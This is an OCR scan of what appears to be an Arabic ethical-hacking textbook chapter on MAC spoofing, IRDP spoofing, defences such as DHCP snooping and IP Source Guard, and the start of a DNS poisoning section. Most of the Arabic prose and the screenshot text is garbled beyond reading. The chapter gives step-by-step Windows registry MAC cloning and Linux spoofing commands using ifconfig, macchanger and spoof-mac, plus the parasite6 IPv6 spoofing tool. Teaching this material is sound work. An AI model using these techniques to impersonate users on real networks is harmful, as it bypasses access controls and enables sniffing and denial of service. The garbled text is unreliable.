. (Spoofing attacks)^^ 1 cjU^J J 1 ^ IRDP j 

MAC Spoofing i- 

MAC ojj^ ls^- J j > ^N MAC ojj^ ^^Luj U (Intrusion detection systems) Ji^lt 

MAC J^J jfi J MAC SpOOf .^J^VI ^» * Ia jjjaj (j^-aJ j ^xu^axJl <Jjfl ^ j 4_*jb 4_pLJl 

^^LiLojVl <J^-^ J o^^W^ clA^ 'MAC Spoofing <J^-^ Cy* ^jial ^^-^ ^ -W^j^j '^^^-^^ 

_<£jjuol3 ^j^JjuLg aA^Jjuix* Aj^A (^^-Sc 
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IRDP Spoofing ^ 

cjL^SV <4i . ICMPJ ja j ICMP Router Discovery Protocol J jU^I IRDP 

JjLuj j i bjja^l l JlL ."router advertisement" ^ ^Uio>VI J^U. Jc jj jl 

^jI^j IRDP J jLj^I I . jjiij j3 ( b^J] (routing table) ^j^l J ^router advertisement 
.router advertisement J^j t> jSa^ll ^ V IRDP ul ^ jLu* 
IRDP (JjLujj cJ^jj J 3 CP" $ ^ 6 J^-^ c£^l jLoixJI CjUUJI ^jj] ^^^jJal jliaVl jLuia3I/4_i^ jlill cJ^* lS^s ul a ^ ^ f ^ ^ $ ^ 
.< < > ^*i^ l J J^j cjU^a jV j 4 sniffing<denial-of-service c^jJ ^ .^^11 Jj router advertisement 



MAC Spoofing/Duplicating 



a1i^\ Jc cjVU^jVI JJ ^ jjjs Media Access Control address (MAC address) 

c _^j1I > tAjL^aVl 4 ^ uull (j-<i Jj^aVl (3f^ ^ ^ ^ £-jj^a 4jUr. jl j£j Jj j-Lujj duplicating c<-qIc cjIjLsu .ajjLJI 

MAC Ou^- fl^^W MAC u^j^ ^ ! MAC duplicating MAC uL^ cMI j* ^ -y? 1 ^ 1 

11a J .a£jj^3U (jJj^al^ Ac- *!>U*] MAC u^j^ c> ^f^l J^ ^-aisll Jc- c$ MAC Duplicating 

(jl jjc <JL^JjL ^ig_xJl ^jli ^aJ .(JjjJJjjuJI jila £A JaLaOJ ^jJaJJjJ (jjill ^!>La*-II (j-o MAC U^J^ C ' ^J^^ ^J^J Vj) g <^l J?£^ 

Jlii^VI 4_iLc ^Uj ^j^aj .<Jc Jj^a^. ^ill AjauJallj <j-aUJ! MAC u' Jl ^ (J- 3 ^ MAC <jl Jj^s l^I ^ MAC 
a£jjoJI Jj <J jll ^1 £ *\\\ (j^-dj 6 JUlUj , JjiAxil ^<JI jj^JI ^^>^ ^j^t> Jc <J jj^^SI Aj£-<»j ^.l^JI (jla ^(Spoofing) 

,a£jjoJI Jc (J*ilU ^illj Lft (j^akjuj Aj^a Jc ^!)LiLajVlj 
: MAC Spoofing/Duplicatingf j^* ^2 J^' J^l ^jit 2^J^ 



My MAC address 
is. A:B:C:D:E 

Legitimate User 



Siv/rfh ftp^r: Allow access to the fietwor k 
only if your MAC address is A:B.C D E 
: mm ■ 



AHA 



Switch * 




Attatker sniffy the network for MAC addresses 
of the curr-entty aiwcisted users and then 
uses, t hat MAC add ress to attack other users 
i»£Ci»T*ctothe s*m* switchi port 



Attacker 



6 

Internet 



Note: This technique worb on Wireless Access Points wrth MAC filtering enabled 

.MAC J^tij ^jj J2) j (jjJjj) jJl Cjlixui J J^u 4 j^Mt d^A j^la 



MAC Spoofing Technique: Windows (in Windows 8 OS) 

uc. J^ Vj (i^j jl jSaj 11a .6^1 j AiL Ja ^ jjjl jU MAC jl (jj^ cjl MAC Spoofing 
MAC JJI j^jl j^l/^j^l s j^aI .I^j MAC u'j^- J^j' s J^' u^j 6 j^jI J' c> 

j-aVl ^l^i^U jjjIjII J^ MAC cjIj^ ^ c5j^l ."clone MAC addresses" l^Jj jUj -ola 

.i^ljll ^1^1 J MAC-address 



i^l j AiUaj cA£ lij MAC Spoofing ^I^V cj! Ja^JI ^USL t*Ui j . (NlC)^f^l : ^l j ^ > J^ M ji^VI tiA 

:cloning MAC address 
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Settings Control Panel -> Networking and Sharing Center 

.(Ethernet Status window) ^Jy] ^ JM cs* Proprieties Jb* Ethernet 6 j* 
.Advanced tab MOf^' Configuration j jJI <ija jfcl '(Ethernet Status window) ^jk\ J-M 

j!>Lk ^ Ljajl l^jll J jll jLoj ji^ ^ Network Address lP 3 'Property ^ 

.Device manager 



Device Manager 



Help 



Action Vi*-w 

► I hb I m I B BE I « 



A RAGE-PC 
t* lfl Audio rrtputS a^d Outputs 
:• Compute* 
t» 1 * Oi*fe drive* 

Display Jri^'.tfi 

!■> HymJin rrrterf KCC Devices 

:, I IDE AT A/ AT API controllers 

ij Keyboafds 

Mits and other pcinting devices 

LV Miinitnn 



E 



Network isdap tef s 
Sp Attreros ARS12 VAR&1 1 3/ARE1 14 PCI 



E Ethernet Controller 



B PU I UU I BU B U I LBI 

Ports -CCOM St LPT) 
rffB* Print queues 
t j Processors 
.EQl Sensors 

Softwrire: devices 
t? Sound. vJd'eo 4nd ^mecontrollefs 

<^ Si eracje controllers 
:■ System devices 

m Unrvers*! Serial Bus controllers 



.OK l3j^ j^" ^ MAC <jt s-"Sj rvalue 4 oV^' ( j^t^ cs-^* 

4^>UJ) <jjj MAC ljIjJ* J*-** 
t> jSaall j^ljVl ^ "net config rdr" J "ipconfig/all" 

.(Registry 



Broadcom NetLink fTM) Gigabit Ethernet Properties 

General | Advanced { Drtver Delate Everts Ppwer Management 

The following properties area vaieWefcr the nefworit adapter Qbck 
the pnoperty you wart to change on the loft, and then select *3 value 
on the ngN 





Vakje 


ROW CurJjut 


A 1 


• Ml 4200 1234^ 


It AmL^t Moderflt*on 







Large Sand Offload (IPv4) 

Large Send Offload Vernon 2 (lPv- 



Networtt Address 



Pnorrty & VLAN 
deceive S*oe Seeing 
RSS Queues 
Speed A Duplex 
TCP/UD P Check«n Offload flPv* 
TCP/UD P Chockawn Offload flfNi 
VLAN ID 




: 



OK 



][ 



Cancel 



i^lj CjlaUaj t_ajLiVl I^a JjJaL .(registry)J^^> j^j^ (i^j^ c> MAC Spoofing l^jj 

jjj^i JjjL MAC <Jj± ^IjtaJI ^ .cloning MAC addresses ^ V ^ (NIC) 

: (registry )J^^i 
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:<^l ^ - 

Go to Start -> Run 

.registry editor ^ regedt32 £ 
registry editor M regedit <r"£i V :<Uajal4 
jLoiJl ^jjj registry editor <> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e972-e325-llce-bfcl- 
08002bel0318} 

.(e 3 ! '0002 'OOOO'OOOl 1*^) ttfill ^ ^ Jioj ^1 j f li ji ^jji j> AjjL. ^AiJ! j>Jl ^ - 
^jjila^JI j]| ^^Jc. jjjjtll < . lull lall "DriverDesc" 1 . f 

cjUUJI g. jj) "NetworkAddress" f-VI ^ NEW Value String c 1 ^ 4 JO* 3 j S - 
.Value String £ o*j New jM^I ^ c^j o-^ 1 j^ 1 <-D^ (> ^ MAC u 1 »l ("REG_SZ" 



Fil. 



Registry Edfnr 



Eo t 



Vre- 



Fawdrrtes 



Help 

t4aoB&B£^Gfa&-1?ci2-bleS^ ^ 
{ Jd36e9*i5 ^e32 5- 1 1 ce-bfc T 
[Jd56e9&6^ e32 5~ 1 1 ce-bfcT -0£ 
|4d36^67- e32S- 1 1 ce-bfc t -OS 
t-adSfie^&S - e325- 1 1 cc-bfc I - &fi 
E-ad 3^*9*63 -e325- 1 Ice-bfcl 0£ 
{4d34e46ii-«32S- 11 ce-bf c 1 -&£ 
|-3d3*e-S*6ta-e32 1 1 ee-bfc 1 - OS 
[^d 3ee5*c- e32 5- 1 1 ce-bfc 1 
f4d3*e9H&<l-e32 5- 1 I ce-bfc 1 - OS 
f ^kd3S«S*&e- e325- 1 I ce-bfc T -O* 
|^td3*eS*r- e3.25- I 1 ce-bfc 1 -OS 
14 d36*97tKe325-1 1 ce-bffcTi -HO* 
|4d3fe371 1 cc-bfcl -OS 

:>-=! 3Se972-c32 5- - ke- bft 1 - C-£ 
□Ouu 
■ ,Jt 000* 
..^ OCX>2 

oooa 

• J* 0004 
ocoa 

Prop 



t>-<J* 

r- ■ jU 



Name 
■ +r (Oefaultl 

" R owC o ntfo I 
% m £l *lfT>rpe 

"intefruptModer.. . 
.Jifcj -iPCh«clcsumOf„. 
"JLirmboPaclc-ert 

"ivl^d ia~T;yp-e 
"Physical IVledM-a. ._ 
*R*e*5v*Birff*:ri 
*Sp>e.*-£f Duplex 
-^S] -~TC PCheckiumu.. 

'TCPCheckium 

irmitBuff ers 



L_j_ 



Firtd... 

D el et <? 
Rena me 

txpa it 



■ — ansn 



RfG_SZ 

REG_OV^ORO 
R£G_SZ 

R£G_5Z 

R£G_DVA3R0 
R£Q_DWORD 
R£G_SZ: 
R£G_SZ 
REG_SZ 
REG_SZ 
REG 



Data 

(value net set; 

3 

Owoooooooe t&j 
i 

3 

1514 
O 

16 



Key 



Siring Value 



Copy Name 



fc?i nary Valu* 

■QWORD t&a~b*tj Value 
rwlulti-Sti-ing Vatue 
Expiandable SXrimg Value 




D&4 «135J 

c rVve^_1 569=ckcl tv_102c^aul*5y*;_lu261 9*9fitrf 
pCfiVEN_1 969&lDEV_ 1 02:&6rS4JE5YS_ 1 C' 2 & I 9 69 



|e;Change-a-CQmp uter 1 s- IV1 a c - A.d cl r&&s- i n -Wi n d ows- Step- IZ.jpg la ss-M^d 3Ge&T2- e32 5- 1 Irc-bf c 1 -_0e0O.2 , be1O3 ^:rv E. J 



— 



l-=l(= 



l'cJ:t. ;] t_J> 
^. .- ^ 7 1- 



11.-^- — Fr 1 - -3Fk'«^ h*- 4^! 1 \ — . 



lca-crm-oeacQiK-as *e-; 
1 c e- 1* c 1 - aSOfeZ be -« 3 

iLi=-fc*ci -aecc2fct--a3-A- 
1 <: c- rfc 1 - *»w t-= -* a : 



■ 1 



^ t, nan 

i 




Oi£ocigg0oc m 



_ 1 CTl ahs db^.U^'ia^ 

J iS All ^ 

*Q i>b< cc r>l 



|-„. Kr 'l r ^ 11 - f ' 

Jl* f^3t&d»7a>- r32S< 1 1™ Uhzl 

H^iii Jm* -J-EJii- I Ics-cfc : 
l<5d i6a9?S-uiii-1 1«i-=f cl 

r . f-«d a6-s*" , "-d eJ25 lice hrfc I 

■T^d li-^^T-^i.'-^l 1 t — : r. 1 
J- poiiTitLa-aist-nsfi-jicc 
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MAC Spoofing Tool: SMAC I 

http://www.klcconsulting.net : j^^il 
J^l ASii CjjIS MAC aJj^ (MAC Spoofer) MAC u>j^ jj«2J *b1 j>aSMAC 

* (software-based MAC addresses)^ S^JI MAC ^ .(2000 j '2003 ^ o^jj <^ Jj^j) 

ii^j A^aJl MAC u^j^ .(hardware burned-in MAC addresses) * j^Vl ^ ^ISII MAC uL^ j^s V 

ji JS Ut ^jj till ^joij . (MAC Address Lookup) MACojj^ ^-^^ j^j . J^jII sjIc] 

<jl jjc S^LcLujV till ^r.,<u.nJ Lo£ .aAl^a <^Jj^ C5 ic ^LajUJt tillj jl D^J^aJl MAC U^J^ LS^ cK^J < 3 kj&ll jL^ajVI 

MAC u»j^ j] ^> c> ^VlMAC 
'NIC description < (Active status)^^\ < (Device ID) jW^ lU^j ^Ij NIC Jj^ cjUjI*^ jjSJI 
'Spoofed MAC Address * Active MAC addresses'IP u'j^ 'Spoofed status (Yes/No) 'NIC Manufacturer 
IS .^li ^ijll cilL^ ^L^ sbVl 6iA .Ija. .NIC Configuration ID 'NIC Hardware ID 

Troubleshooting network problems, testing intrusion detection/prevention systems (IDS/IPSs), testing 
incident response plans, build high-availability solutions, recovering (MAC-address-based) software 
licenses, etc. 



File 




SIVIAC Evaluatton Fvtocie 

Vin&w Options Hel:f> 



KLC Consulting: www.klcco ns uRing .net 



Alhefo&AR81 21 /ARG1 1 3/AR 811 4 PCI-E Ethe 



1 32. 1 68. 254. 1 OO 



I*-** Show Onltv Aclive Netwoik Adaplees 
New Spoofed MAC A-cfoV&ss 

i -i -f -i -r 



- 



— i 



I 

Spooted MAC Address 
|Hot Spoored 

Active MAC: Address 
SOO-30-1 3-AF AJ5-QA 



Update K+AC 




R emove MAC 


1 






iPOotntrg 


1 


FH jndori-. 




MAC List 


1 


Ref rest-* 






1 



Netiwoik C 
fFJttterrtel 



3 



| 



Disdamner: U tEids program your own iisk. \*/e- are no! re-sporvsiofe for -anv dam^^e (he4 rr*ay occt* to -airij* sj*sl:enn. 
This- piogf^m not lo i>e used for ^iny Kegal. or "gjjgjjftgggj purpgFe. Oo rtot use this program if- yog do rjjgt ~=i«jT&e with 



■ - -■ "- - - 



.<j ^UJI MAC 

dm ^"New Spoofed MAC Address" <Jy* ^ J>J1 t> MAC 

MAC 



SMAC 2.0 Evafuatton Mode - KLC Consulting: www, klcc o ns ul ting. net 

| Fits View Options Help 

ID | Actrver | Spocfed | N etwotk Adapte 



| IP AddTi 



Acttve MAC 



OOOO Yes 



A theios AR SI ^1 /AR81 1 3/AR SI 1 4 RCr E E ther. . 



1 92 1 6S.254 1 OO OD-3CM 6 AF-A5-OA 




— I SI —I E5 —| B-4| ^<J 



Update MAC 


1 


Remove MAC 


1 


R«s4-att Adopite* 


1 


[F-Corih^ 


1 




1 


MAC List 


1 


R&Jresr-ii 


J_ 


E xi! 


1 



Spoofed MAC Address 
|Mo^ Spoofed 

Active MAC Address 



[0O-3O-1 SAFA5QA 



j fEa^errfcet 

Hardware ID 



|pci\ven_i sesde v_i 02Ss<jb^y*_i 02S1 3&Srev_bO 



J2J 



>> I 



lOisclaknei^ Use thts prcHgrem at your own nsk, "We 
| This piogtam rajt Eo t>e used for -any illegal or 



r*ol f^soonsibfie for aunjf d^mege thai rrt&y occun to an^i «.y«»em. 
p4jroo^se. Oo not use this progrem if you do t »ol dCfree with 



--- ; : - 
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D2XXXXXXXXXX 
D6XXXXXXXXXX 
DAXXXXXXXXXX 
DEXXXXXXXXXX 

.random (jj* j ^h' j j ^ c - lSjj^ 1 ^ J*^ j MAC ^ 

uj^ yr*^ c> " (Automatically Restart Adapter) Jj^Jl Jji^all fclcl" jLaJ! jliiJ 



File 



ID 



□GOO Ves 



SMAC 2.0 Evaluation Mode - KLC Consulting: www.klcconsuiting.net 

View Options- Help 

I Active MAC 



Automatically Restart Adapter 

Log fulAC Address Changes 




OO 00 30 18AFA5 0A 



l^ Shcnw Only Aclive Metwoik Adapters 

Wew Spocrfed MAC Address I 

[ —| FjA — ] 54 — | SI — J E5 — | 6-l( 





Update MAC 


Re« : ■•• ' - 




FSestait Adapt 


iPConfig 




Random 


MAC Usl 




Reffesb 


Exit 



Spooled MAC Addiess 



[Not Spoofed 

Active MAC Address 
[00 30 18 AF A543A 



Metwoik Connection 
| [EiHeJnot 

Hardware ID 



|poi W*n_1 36Sde v_l G26subsys:_l 0261 9G9rev_bO 



D isclaimei : Use this program at your own risk. We ate not responsible for any damage that may occu to any system. ^ 
This progiam is not to be used tor any MEeg-al or unethical purpose. Do not use this proggam if you do not egree wfth v 



jl ^ ^3!^ .t*L (j-aUJ! MAC u' ^u^" (4j 4£f^l Jl^ajl JJaxj ^Iluj ."Update MAC" 

„t*L Sj^Vt 4-ajl5 ^ j^i ^ MAC 

.IPConfig (Jj* (Jjuialll I^A ^ djJjU^ <£jJa3l aj 

.tSL o-aUJI NIC t> ^ ji*-^ i> (jjjWfl ^IjVitj - 

? UaU) SpoofMACj (Technitium MAC Address Changer) TMAC <$>Sfl cj%kUI q^u L^l ±^ : A&j*1a 



File 



Technitium IVIA-C Address Changer v6 

Options I— I el p 



b-y Shreyas Zlare 



Network. Connections: 






Changed 


| MAC Address 


1 




Link. Status 


S peed 


F^n Wired Ethernet Con 


nectior 




No 


00-0C-29-C3-FC-B 1 




Up. 


Non Operational 


O bps 


l-^-l "vA/ired Ethernet Con 


nectior 


2 


No 


OO OC-29-C3-FC-B E 




Up. 


Non Operational 


O bps 


Is-"! '•■.■•■/ i r e id Ethernet Con 


nectior 


3 


Ves 


OO-I E-A3-23-9F-D3 






Up. Operational 


1 gbps 


Is-"! Local Area Connection" 9 




No 


OO-OO-OO-OO-OO-OO 




D own. 


Non Operational 


O bps 





nforrnation j IP Address | Presets | 
-Connection Details — 



Connection \A/ired Ethernet Connection 3 

Device I nteI[R j PRO/IOOO M T Network Connection U3 
-t ardware I D PCI WE N_SOS66 c D EV_1 OOF&S U B SYS_07501 5A[ 
Config ID KO GS053G1 -1 E 7C-4D A4-905E -FE GGG9E 92E C8} 



T CP/I Pv4 Enabled 



TCP/IPvG: 



E nabled 



Oricjin-al MAC: Address 

OQ-OC-29-C3-FC-C5 

VMware. Inc. [Address: 3401 H ill view Avenue. Pal 

Active MAC Address 

OO-I E-A3-23-9F-D3 [Changed] 

Nokia Danmark A/S [Address: Frederikskaj. Coper 



■ Change MAC Address 



Random MAC Address 



1^ Automatically restart network connection to apply changes 

I**-" Make new MAC address persistent 

I Use '02' as Hirst octet of MAC address Whi- ? 

Restore Original | 




Received 4.25 MB (4454340 bytes] 

-Speed 2S.GG kbps [35S3 bytes] 

Sent 1.1 ME [1 1 4S39G bytes] 

-Speed 285.53 kbps [35691 bytes] 



A 



https://www.facebook.com/tibea2004 





Wl| Technitiurr 


i MAC Address Changer v-S - 


b-y Shreyas Zare 




File Action Options 1— 1 el p 




Network Connections 


Changed 


I MAC Address 


l 


Link Status | 


Speed | 




I 1 -" 1 ! i r e id Ethernet Connection 


No 


□□-□C-29-C3-FC-B 1 




Up, Non Operational 


□ bps 




L£| Wired Ethernet Connection 2 


No 


□□-□C-29-C3-FC-B B 




Up, Non Operational 


□ bps 




I-- 1 *! Wired Ethernet Connection 3 


Yes 


□□-1 E A3-23-SF-DS 




Up, Operational 


1 gbps 




I 1 -" 1 ! Local Area Connection 11 9 


No 






Down, Non Operational 


□ bps 



inform .3 hi on | IP Address Presets | 

-Network Connection Presets [D efault. tpf] [Original MAC Address]- 



Presets 


Random MAC Address 




Original MAC Address 





















































New | Edit | Delete | Apply | 



Property | Value 


MAC Address 


Use Random 




IPv4 Address 

IPv4 Default Gateway 


1 S2.1 6B.1 .2 [255. 255. 255. □] 




192. 1GB. 1.1 [□] 




IPv4 DNS Server 


1 92.168.1.1 



















































































How to Change a Computer's MAC Address in Linux 

jj&j ^SiA 4> o-aUJI MAC "Spoofed" ^ jh ^j^j .aj o-^UJI MAC u> "Spoof ^ * ^ 

b LjU& Jjju^ill s^Uil x& dj^i ^1 j "Spoofed" MAC u> j*- 



f*— II fi" IF" ll F3 IFTJI 1— j 



i 



c 




#sudo ifconfig ethO down 
#sudo ifconfig ethO hw ether xx:xx:xx:xx:xx:xx 
#sudo ifconfig ethO up 



chris@ubun tu 1404vbox: ~ 




chris@ubuntul494vbox:~$ sudo Ifconfig ethO down 

chris@ubuntul404vbox:~$ sudo Ifconfig ethO hw ether 12 : OO : 15 : b7 : 36 : 92 

chris@ubuntul404vbox:~$ sudo Ifconfig etzhO up 
chris@ubuntul404vbox:~$ 
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#ip link set dev xxxx down 




#ip link set dev xxxx address xx:xx:xx:xx:xx:xx 

xx:xx:xx:xx:xx:xx j U ±\ jA\ AS^ill Cj jl£ xxxx MAC ut ^ ^ 



.^Jl MAC u'j^ 




I^Vl^ 4£jjaJl djjl£ (Jjjljujj S^lcL ^ Jai ^1 



— » » ■ aHfcl^—fW* : — S s udo - i_ 

[ sudo ] password for mmMMmmWmmmmmmmm* 
root^ : — #i_p links how 

1 : l_o : < LOO PB AC K , U P , LO W E R_U P> ntu 6 5536 qdlsc noqueue state UNKNOWN mc 

llnk/loopback 60:06:00:66:66:60 brd 0O:OO:O0:00:O0:0O 
2: ethO: <BROAOCAST ,MULTICAST> ntu 15O0 qdisc pflfo_fast State DOWN fflC 

qlen ieoo 

link/ether mm- ** t>r~d f f : ff :f f :f f : f f :f f 

root@4Mf0W*M^:^9 ip link set dev etHe down 

root(3^KWPt i l i M t -ff * — "■ t - =.^Hi- eS s 74:de:3b:9f :d8:4B 

root© - : — i p link set dev ethO u p I 



:JN\£ cA jAl u^au ^IjIIuuL MAC l) 1 

Macchanger -1 

#sudo ifconfig ethO down 

#sudo macchager -m AA:BB:CC:DD:EE:FF ethO 
#sudo ifconfig ethO up 
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-h, —help Show summary of options 

-V, —version Show version of program 

-e, — endding Don't change the vendor bytes 

-a, —another Set random vendor MAC of the same kind 

-A Set random vendor MAC of any kind 

-r, —random Set fully random MAC 

-1, — list[=keyword] Print known vendors (with keyword in the vendor's description string) 
-m, -mac XX:XX:XX:XX:XX:XX Set the MAC XX:XX:XX:XX:XX:XX 

:<Ui*t 

EXAMPLE macchanger ethl 

EXAMPLE macchanger -A ethl 

EXAMPLE macchanger —endding ethl 

EXAMPLE macchanger -mac=01:23:45:67:89:AB ethl 

SpoofMAC -2 

https://github.com/feross/SpoofMAC 
jjoj ^glc Qi&iAj jjALj (Jjt.uuII ^^Uail staVt *>i& 

#spoof-mac set 00:00:00:00:00:00 enO 

:^U3! j*Vt J^U. <> cillij L5 LJy\ MAC u 1 J 1 ^ ^ f ,:Lklaj| clA^ 

#spoof-mac reset wi-fi 

parasite6 -3 
.IPv6 u^j^ t° lW-*^ staVl aifc 

#parasite6 [-1RFHD] <interface> [fake-mac] 

i^Vt* 4^ A^L*1\ C^t jLiJt 

Option -1 loops and resends the packets per target every 5 seconds 
Option -R will also try to inject the destination of the solicitation 

Options NS security bypass: -F fragment, -H hop-by-hop and -D large destination header 



IRDP Spoofing 



Sj^V IP u^jU^ cJil^V i <u>™\\ a^j^I J>iijjj j* ICMP Router Discovery Protocol (IRDP) 

router advertisement and solicitation J^j ^Ui^VI <> <j 4-^UJt jill a£j^3I ^Jc .k&lt jjjt jII/ajajjII 
.spoofing router advertisements <j&j^ t> ^ fU^I ^ ^ CjVU^I 4iUbt ^1^13 . V^* 1 

^I^aII . DHCP^ c> c> ^^lt (default route) ^ 

tilli ujj^^ L - ^-^-^ >>^li (jl ^jUijJa] aJIc (lifetime)4^ j-^ j <Jj> ^>^t 130^ ^ cS^^ 

^aJ jj,jjjj ^aUaj J J^-J _4_l^jJall \ ^-llc ^JJ <^Jl <£jjuJt (JjoSJ* Jc ^a g alt (Jjuj tit JJ ^a g It ti& .(JjJa^xJt Jj3l£ 

<li tJaia ^t j JU^t ^ j tila .djVU^ aJi^ I router advertisements c> jj^j^ ' DHCPJ^*^ uj^ 3 

'. ls j^\ jjaVt jjlt jU^t c Ljubj 4^ jilt A£jj^3t J jt jixJt jl£ tit .Ajc^ jilt A£jj^3t (jxuia jJj^Jt IP jt jjc <jl£ tit U ^j'q^ jj ^j 

j£ jx^j* 4JLjk> router advertisements j jj c&j^ Cp- ^al^> J^t li* ^at^ki^t jj^l^ll jl^j 

^lA^l^xJt 5-t^t A-iflj£ j£jaJt ^jJajJ _ dj\_jl_ljit Jc dl^Jjlt ^t^l g 6 C5^^^J (S ^aUaj j!^. ^j-d <j£jJJ diljljjJt ^ j^- 

. JjU33U IRDP 
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Routing Table 



Attacker 

J) ^fc IRDP J^a f till <P± <> ARDP Spoofing <$Ai3 



(How To Defend Against MAC Spoofing) MAC Spoofing 



V*Y\\a\\ CjU^JI iiiiil cAi jiVI t^&Uj j^jS ciljlik^Uj >C5 S5l^Vl jL-ajill i> cs-^J^ ^^Jl j& £*Vl cj! *lj^J 

Aj^Vl Jc JJ^ <j' <*m V J -C5^Vl j£#ll J Jc JJ^ ^^Sl ^LJalall j\ 4^1. nit .Ua 

CjI^suII AjjuAAxJI S^LjaxJ! j^l^l ^niaJ ^^LkVI (jL^jlll <Jjou31j 4_^pJlj <_£^)j£3l A a$ a\\ q\ dlla .AjjjIj <-<^<i ^^>^<i ^ c fl^JI 

4_jU^J o^Ljaxa j^l^l (j^lflaJ L_±^J 44_il<»VI CjI^suII £-<^.j MAC Spoofing s v ^ A£jjua3l jUlkU c*Lalj§ 

.CjVUJ! cJJil^ ^ i^lia ^ ^1 jMAC Spoofing ^ ^UUJ! jglJjil <> ^AxJI .MAC Spoofing i> 

iaia A^ixj jj jIj3I/cjI^ jJI jV cillij . jj jljll/Aja. jjII jl^a. ^UJI ^ j MAC Spoofing ^ ^UJ3 aIluj j JjJaal 
(Port Security) <>f oJj^ .^£^411 J MAC ajj^ u^r 1 ^ J 'IP ojj^ 

MAC u'j^ 'Port Security j*f p% .MAC Spoofing < bikjl ^ yJ\ a1±^j ^ 

. (Port Security)^ j*^ Cy 6 ^ ^ J ^iUJV ^ cJ ^Ikill 

:MAC Address Spoofing cjLa^a i^a £tirtl l^LuuV) Iiajj l^i 

DHCP Snooping Binding Table ^ 
^ .DHCP binding Jj^ <^U? ^ tij^^ DHCP l5j^-j SjSli? ^jL DHCP snooping 

^ jat jjj! i^l jll cjU jk^ j t VLAN number ^binding type 'lease time 'IP u'j^j MAC u' J 

{jg& ^cLoaJ 4J| Lo£ .DHCP ^ J^"J c3j^ J -0 sjj 0 .. 1 ^^-^ ^-^^ .(J^J^^ c3j^ ^ L — J W^^ 

Dynamic ARP Inspection 

MAC J» IP 1 jj^ 1 <^ ARP <S JjUull MAC u 1 j IP ojj 1 ^ c> 

.Dynamic ARP inspection ^> aLHJ ^ <jla 6^31^ jj6 

IP Source Guard ^ 

^liL^j t> l^j Jjj^ 2 ^ IP a£ ^ <i!^Luj ^1 jUVl s jfc IP Source Guard 
^.I^aII J ^•^ c - J^ijVl djl ( . iiaj C5 ic til^cLaaj .DHCP snooping binding ^—^-^ ^^clS bliLaal jj^Ji ^j^- 

m j±>\ i * a J - ^ o ^j^i IP ^jt jic a I iklLuji jl tilled. 

Encryption 

.MAC Spoofing SjLLa jj^ j^j^^^ jWj (Access Point) J^-ajll cm ^VU^jVI 

Retrieval of MAC Address *t 

.JjijuSSlI ^Ikj ^> I^j^UIojI ^ V^j Sjj^Ux NIC t> MAC ^l^jlual Ujta 
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Ipiddzess Lcjuhc Type V1AN Inter race 




io.mio.1 
IV1AC A 



DHCP Snooping Enabled : 
IP Sourte Gu^rd E 



10. 10. lO, 2 jj^f^jjf ^* b Tj ] 



^Enabled I |— 
1 Ena b l^cJ r 
i Enabled ,* ^ 



IP and MAC entry in the binding table 
ttyn nut rn Jtth then discard th<? pjcktt 



L Traffic Srnt with IR 
10.10.10.2 Mac C 

^Received Trsrifie SowrKwl 

IP 10.10.10.2 IVIdc B 




Traffic Sent with 11* 
JO lOKXS Mac B 




10-10 .10 S 
IVIAC C 



Check The M A.C and IP fields to see If the treffic from the 
interface ii in the binding, table; if not, traffic is blocked 



] 



DNS Poisoning 8.6 



jUlkl <JU3I 4_k^<JI ^ 44jjU^J *^LjaJI j^lilll J^iaj tAAc LJia>jfl MAC Spoofing uL^A 

.DNS Poisoning ^ a£j^JI j 
.DNS Poisoning ^ ^lidl ^LjaJI jjjUl j 4iliLJI DNS Poisoning c> ^j* 2 ^ ujV* 

DNS Poisoning Techniques 



Domain Name J jU^I j* (DNS) CjISO^I *UJ 4^ . DNSlU^ ^ V ji Ulc DNS Poisoning ^ jl JjS Vjl 
(www.eccouncil.org J15*1I C5^) (Domain name) cjtalkJI/JU^JI <xJ <^ jj lU*j JjSjjjjj ^Service 

cjUUj iictt ^ (a! JjUUI IP jl > j c> *UJ) cjU jkJI u^j^ .(208.66.172.56 <<J13-*1I lW^ ^) IP u ( 

l-sjIa JL^jVI cii^ji lili t^tajl (jc 6jUc < kjl j^JI jl U^a .l^Jc iali^J] tillij ^3UJI ^ jlu^ ^^Ic CijjljVl ^^ic <c 

U cJUfc a fllfrl] <Jjau3U j£3j 4^ ^xJl li$J (j-aUJl IP JI AAjsla iAAc £Z JL^sjVI ^jl lij tdljjliVI ^ 4<U3j AAjsla 

^jujI l_ajju jl tU.^n^jj <J1g L* JL^aj^l! 4il tdjliUaill ^-UujjI jl t Domain Names-^W ^ ^^g-* tciijjijVI 
^jVI o jJaaJI jli ttiL (j^l^Jt ^tL, olLo1\ ^ q\ jixJI 11a LgaIc. t wikipedia.orgj^ 3JLaJI ^ t^a jA\ I^j ^j^aLkSI ^Lkill 

^jla ^jc. liA j tCjlilkill ^Uaj jl 6 DNS-^^ J^* ^ (*^J J-^^ (J-^^^ IP ^ ^jajj^alo ^ajL (^jll 

^-Jl ^ J^^^W J M1 ^^ <-oj^Ul 6 IP-SI (jJjlic tdjliUaill ^.jlj ^\ J^- 

^jlk^j o^j^ ^-W-*^ jA^^ '^j '(wikipedia.org J^) j^^^ cjISLLj *UjuL (207.142.131.206 

.DNS Poisoning jVl s^ij DNS lU^ ^ ^ UjJ jVl 



Step &: Write 
Resource Re cord to 
Caohe 



Step 1 : Check 
Revolver Cache 



Re solder 




Step 2: DortiairT 
M^me Resolution 
Request 



Step 4: IP Add 
Returned to 
Resolver 




Step 3: DNS Server 
Performs DNS 
ookup 



^fe_^JWjthoritatSve Server 



For 

Company.com 
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4^uJa3l a^jj sjIcI ^Lg-xJI <Li JjUj ^ill j^JI 6 jk^ 'DNS Spoofing L^l cS^j ^illj DNS Poisoning w 
t> ^j^l 11a lJ£jjI ^1^11 jSaj . (legitimate server)^ fiUI <> (malicious server) ^iL/^U JJ 
jl dii^ t ABC.com^j* Jj Jj^jll ^ AjauJal i jl j^a jjfcl . DNS<^ J DNS J CjVU^J J ^^1 JjjL ^ 

tillij ^Lall (j^-ftJ .^Ig-xJl ^^Lk Jj 4_i*jJa3! A_ia> jj S^lcj A_i3 Cj^j ^illj La <LjIaJ DNS Jj^- ^Vl^L l_jc!^j31j ^jIj c_a jjoj ^ig_xJl 

.(attacker's malicious server IP address) <^gaJI IP cA ( ABC.com J IP o\j^ up- 

.DNS Poisoning ^ ^j^-j c^^A 3 ^-^1 ^Uaj Ljajl *j tAfiLu* <L Jaj .cAjLuII a£jjujj 
Jj LAjJ ai^I jill ^li^j jlkJI authoritative DNS ^ J^ * j^l c> DNS Poisoning j^Jj <4j 

